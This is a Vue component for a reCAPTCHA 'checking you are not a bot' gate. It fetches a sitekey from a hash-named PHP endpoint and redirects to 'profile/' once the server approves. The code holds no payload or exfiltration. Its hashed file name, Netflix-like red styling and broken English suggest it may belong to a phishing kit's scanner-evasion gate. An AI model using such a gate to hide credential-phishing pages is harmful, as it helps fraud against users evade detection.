<template>
  <div>
    <div
        class=""
        style="color:white;background: #111; width: 600px; margin: 10px auto; padding: 20px; border-radius: 15px"
    >
      <div v-if="loading" style="display: flex;align-items: center;justify-content: center;">
        <div style="text-align:left; margin-right: 50px;">
          <h2>Please wait couple seconds!</h2>
          <p>We are checking  to make sure you are not a bot<br>You'll be redirect automatically after the verification<br>You might be asked to finish a captcha</p>
          <small style="color:white">This site is protected by Google reCaptcha</small><br>

        </div>

        <div>
          <span style="
          width: 150px;
          height: 150px;
          border: 10px solid rgba(255,255,255,0);
          border-bottom-color: #FF3D00;
          border-radius: 50%;
          display: inline-block;
          box-sizing: border-box;
          animation: rotation 1s linear infinite;
        "></span>

        </div>
      </div>
      <div v-else style="margin-bottom: 10px">
        <h3>Please validate the captcha required to continue</h3>
        <button
            @click="execCaptcha()"
            style="
  margin-top: 30px;
  width: 200px;
  padding: 0.75rem 25.33333333px;
  line-height: 19px;
  min-height: 48px;
  font-weight: 400;
  font-size: 17px;
  -webkit-border-radius: 2px;
  -moz-border-radius: 2px;
  border-radius: 2px;
  color: #fff;
  background-color: #e50914;
  box-sizing: border-box;
  border: none;
  box-shadow: 0 1px 1px rgba(0, 0, 0, 0.25);
  text-align: center;
  letter-spacing: 0.025rem;
  vertical-align: middle;
  cursor: pointer;
  display: inline-block;
  text-decoration: none;
  font-weight: bold;

          ">Continue</button>
      </div>

      <vue-recaptcha v-if="sitekey" ref="recaptcha" :sitekey="sitekey" size="invisible" @verify="onVerify" theme="dark" @render="execCaptcha" />
    </div>
  </div>
</template>

<script>
let server = "5eb1efe33df1f94796d7b26842c5146e352a069f.php"
import { VueRecaptcha } from 'vue-recaptcha';
import axios from 'axios';
export default {
  name: 'App',
  components: { VueRecaptcha },
  data() {
    return {
      sitekey: null,
      verified: false,
      loading: true,
      error: false
    }
  },
  created() {
    this.getSiteKey()
  },
  methods: {
    getSiteKey() {
      axios.get(server + "?sitekey=1").then((rep) => {
        if(rep.data.validated) {
          this.redirectToProd()
        }
        this.sitekey = rep.data.ckey
      }).catch(() => {
        setTimeout(() => {
          this.getSiteKey()
        }, 1000)
      })
    },
    execCaptcha() {
      this.error = false;
      if(!this.verified) {
        setTimeout(() => {
          this.loading = false
        }, 2000);

        this.$refs.recaptcha.execute()
      }
    },
    onVerify(rep) {
      console.log(rep)
      this.loading = true;
      axios.post(server, {
        captcha_rep: rep
      }).then((rr) => {
        if(rr.data.respo === "Go") {
          this.redirectToProd()

        } else {
          this.error = true;
          this.loading = false;

        }
      }).catch(() => {
        setTimeout(() => {
          this.onVerify(rep)
        }, 2000);

      })
    },
    redirectToProd() {
      window.location = "profile/"
    }
  }
}
</script>

<style>
body {
  background: #999;
}
#app {
  font-family: Avenir, Helvetica, Arial, sans-serif;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
  text-align: center;
  color: white;
  margin-top: 180px;
}

@keyframes rotation {
  0% {
    transform: rotate(0deg);
  }
  100% {
    transform: rotate(360deg);
  }
}
</style>
